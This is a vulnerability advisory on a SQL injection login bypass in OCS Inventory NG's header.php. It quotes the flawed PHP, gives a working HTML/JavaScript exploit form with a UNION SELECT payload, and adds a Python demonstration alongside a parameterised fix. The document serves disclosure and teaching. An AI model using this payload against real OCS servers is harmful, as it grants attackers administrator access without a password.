SECURITYVULNS:DOC:23175
Feb 04, 2010

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

Source: vulners.com

Software : Open Computer and Software (OCS) Inventory NG
Download : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version : 1.03-beta3 and prior
Impact : Critical
Remote : Yes (No authentication is needed)

== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the configuration of the computers on the network and of the software
installed on them.

The vulnerability is a SQL injection in the header.php file. The "login"
field of the login POST request is concatenated directly into a SELECT
query without escaping. An attacker can supply a crafted SQL string that
reads arbitrary data from the database (via UNION) and, because the password
check is performed against whatever passwd value that query returns,
authenticate as any operator without knowing a password.

script : header.php

if(isset($_POST["login"])) {
    // $_POST["login"] is concatenated into the query unescaped: this is the injection point
    $req="SELECT id, accesslvl, passwd FROM operators WHERE id='".$_POST["login"]."'";
    $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());

    if($row=@mysql_fetch_object($res))
    {
        // DL 25/08/2005
        // Support new MD5 encrypted password or old clear password
        // for login only
        // The submitted password is compared against the passwd column of the
        // row the (attacker-controlled) query returned, so a UNION row with a
        // known hash passes this check
        if (($row->passwd != md5( $_POST["pass"])) and
            ($row->passwd != $_POST["pass"])) {

== Exploit ==

<script>
function inject()
{
    // Post the form to index.php of the OCS Reports install, which includes header.php
    document.getElementById('log').action =
        document.getElementById('ocsreports').value + 'index.php';
    // Close the id='...' literal, then UNION in a row for the target operator
    // whose passwd column is the MD5 of the password "inject" submitted below
    var sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='";
    document.getElementById('login').value = sql +
        document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
}
</script>
<form name="log" id="log" action="" method="post">
<table border="0" width="450px">
<tr>
<td><b>OCSReports :</b></td>
<td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/" /></td>
</tr>
<tr>
<td><b>Login :</b></td>
<td><input type="text" id="user" size="40" value="admin" /></td>
</tr>
<tr>
<td><input type="hidden" name="login" id="login" />
<input type="hidden" name="pass" id="pass" /></td>
<td><input type="submit" name="subLogin" onclick="inject();"></td>
</tr>
</table>
</form>
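The following is an added example, not code from the advisory or from the OCS Inventory project. It reproduces the header.php login logic and the payload built by the HTML form above against an in-memory SQLite table (the table contents are constructed sample data), shows the UNION bypass succeeding against the string-concatenated query, and places a parameterised version beside it that rejects the same payload. The function and column names mirror the snippet above; the sample passwords are assumptions.

```python
import hashlib
import hmac
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the OCS 'operators' table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE operators (id TEXT, accesslvl INTEGER, passwd TEXT)")
    conn.executemany(
        "INSERT INTO operators VALUES (?, ?, ?)",
        [
            # new-style operator: password stored as md5, as header.php expects
            ("admin", 1, hashlib.md5(b"s3cret").hexdigest()),
            # old-style operator: cleartext password, accepted by the fallback branch
            ("legacy", 0, "oldpass"),
        ],
    )
    return conn


def vulnerable_login(conn, login: str, password: str):
    """Mirror of header.php: 'login' is concatenated into the SELECT, and passwd
    is accepted either as md5(password) or as the cleartext password."""
    req = "SELECT id, accesslvl, passwd FROM operators WHERE id='" + login + "'"
    row = conn.execute(req).fetchone()
    if row is None:
        return None
    uid, accesslvl, passwd = row
    if passwd != hashlib.md5(password.encode()).hexdigest() and passwd != password:
        return None
    return uid, accesslvl


def build_payload(target: str, password: str) -> str:
    """Same injection the HTML form builds: close the quoted literal, then UNION a
    row for `target` whose passwd column is md5(password), a value we control.
    The hash is computed here instead of hard-coding the advisory's constant."""
    fake_hash = hashlib.md5(password.encode()).hexdigest()
    return (
        "0' UNION SELECT id, accesslvl, '" + fake_hash
        + "' FROM operators WHERE id='" + target
    )


def safe_login(conn, login: str, password: str):
    """Hardened form: bound parameter (no string concatenation), no cleartext
    fallback, and a constant-time comparison of the stored digest.
    md5 is kept only because that is what the schema stores; a real fix would
    migrate to a salted password hash such as bcrypt or argon2."""
    row = conn.execute(
        "SELECT id, accesslvl, passwd FROM operators WHERE id=?", (login,)
    ).fetchone()
    if row is None:
        return None
    uid, accesslvl, passwd = row
    if not hmac.compare_digest(passwd, hashlib.md5(password.encode()).hexdigest()):
        return None
    return uid, accesslvl


if __name__ == "__main__":
    db = make_db()
    payload = build_payload("admin", "inject")
    print("injected query payload:", payload)
    print("vulnerable login with payload:", vulnerable_login(db, payload, "inject"))
    print("parameterised login with payload:", safe_login(db, payload, "inject"))
```

With the payload, the concatenated query becomes `... WHERE id='0' UNION SELECT id, accesslvl, '<md5 of inject>' FROM operators WHERE id='admin'`: the first branch matches nothing, the UNION branch supplies the admin row with an attacker-chosen passwd, and the hash check passes. The parameterised query treats the whole payload as a literal id, finds no row, and denies the login.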